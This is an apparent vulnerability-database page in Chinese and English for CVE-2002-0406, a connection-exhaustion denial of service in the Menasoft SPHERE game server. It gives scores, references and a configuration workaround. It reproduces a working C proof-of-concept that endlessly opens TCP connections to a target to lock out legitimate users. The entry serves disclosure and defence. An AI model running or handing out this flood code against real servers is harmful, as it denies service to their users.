CVE-2002-0406
CVSS5.0
发布时间 :2002-07-26 00:00:00
修订时间 :2008-09-05 16:27:56
NMCOE    

[原文]Menasoft SPHERE server 0.99x and 0.5x allows remote attackers to cause a denial of service by establishing a large number of connections to the server without providing login credentials, which prevents other users from being able to log in.


[CNNVD]Menasoft SPHEREserver .99存在拒绝服务漏洞(CNNVD-200207-135)

        
        Menasoft SPHEREserver .99是一款在线角色扮演游戏服务器。
        Menasoft SPHEREserver .99存在一个拒绝服务漏洞。
        Menasoft SPHEREserver .99在配置中没有对IP进行限制,因此任何人可以多次连接服务器,而且任意一个客户端可以不需要用户鉴别进行连接,因此就存在客户端可以对服务器连接达到最大连接数而拒绝对其他用户的响应。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:menasoft:sphereserver:0.99f
cpe:/a:menasoft:sphereserver:0.99i

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0406
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0406
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-135
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4258
(VENDOR_ADVISORY)  BID  4258
http://www.iss.net/security_center/static/8338.php
(VENDOR_ADVISORY)  XF  sphereserver-connections-dos(8338)
http://online.securityfocus.com/archive/1/259334
(VENDOR_ADVISORY)  BUGTRAQ  20020302 Denial of Service in Sphereserver

- 漏洞信息

Menasoft SPHEREserver .99存在拒绝服务漏洞
中危 未知
2002-07-26 00:00:00 2005-05-02 00:00:00
远程  
        
        Menasoft SPHEREserver .99是一款在线角色扮演游戏服务器。
        Menasoft SPHEREserver .99存在一个拒绝服务漏洞。
        Menasoft SPHEREserver .99在配置中没有对IP进行限制,因此任何人可以多次连接服务器,而且任意一个客户端可以不需要用户鉴别进行连接,因此就存在客户端可以对服务器连接达到最大连接数而拒绝对其他用户的响应。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在配置中设置death_socket变量为3。
        厂商补丁:
        Menasoft
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.sphereserver.com/

- 漏洞信息 (21337)

Menasoft SPHEREserver 0.99 Denial of Service Vulnerability (EDBID:21337)
multiple dos
2002-03-09 Verified
0 H Zero Seven
N/A [点击下载]
source: http://www.securityfocus.com/bid/4258/info

Menasoft SPHEREserver .99 is an online role playing game server. It is vulnerable to a denial of service; multiple connections to the server can be made from a single machine, exhausting available connections and denying connections to legitimate users.

/*
 *
 * www.h07.org
 * H Zero Seven
 * Unix Security Research Team
 *
 * Sphere Ultima Online Server - Denial of Service Vulnerability
 * poc-exploit...
 *
 * Simple code to eat all connections from the gameserver, so other
 * peoples could not connect to the server.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

int Connect(int ip, int port)
{
   int fd;
   struct sockaddr_in tgt;

   fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (fd<0) return -1;
   memset(&tgt,0,sizeof(struct sockaddr_in));
   tgt.sin_port = htons(port);
   tgt.sin_family = AF_INET;
   tgt.sin_addr.s_addr = ip;
   if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0)
return -1;
   return fd;
}

int sprint(int fd, const char *str,...)
{
   va_list args;
   char buf[4096];
   memset(&buf,0,sizeof(buf));
   va_start(args,str);
   vsnprintf(buf,sizeof(buf),str,args);
   return(write(fd,buf,strlen(buf)));
}

int main(int argc, char *argv[])
{
   int fd;
   struct sockaddr_in box;

   fprintf(stderr, "SphereServer DoS Exploit [poc]\n");
   fprintf(stderr, "H Zero Seven - Unix Security Research Team -
www.h07.org\n\n");
   if (argc < 2) {
      fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]);
      return;
   }

   fprintf(stderr,"for the full advisory regarding this vulnerability
visit www.h07.org ... \n");
   fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (fd<0) {
      perror("socket() ");
      return;
   }

   fprintf(stderr,"Attacking sphere : ");
   for (;;) {
      int sock;

      sock = Connect(inet_addr(argv[1]),(argc>2)?(atoi(argv[2])):3128);
      if (sock<0) {
         sleep(10);
         continue;
      }
       fprintf(stderr, ".*");
   }
}
		

- 漏洞信息

5305
Menasoft SPHERE Connection Saturation Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2004-04-09 Unknow
2004-04-09 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站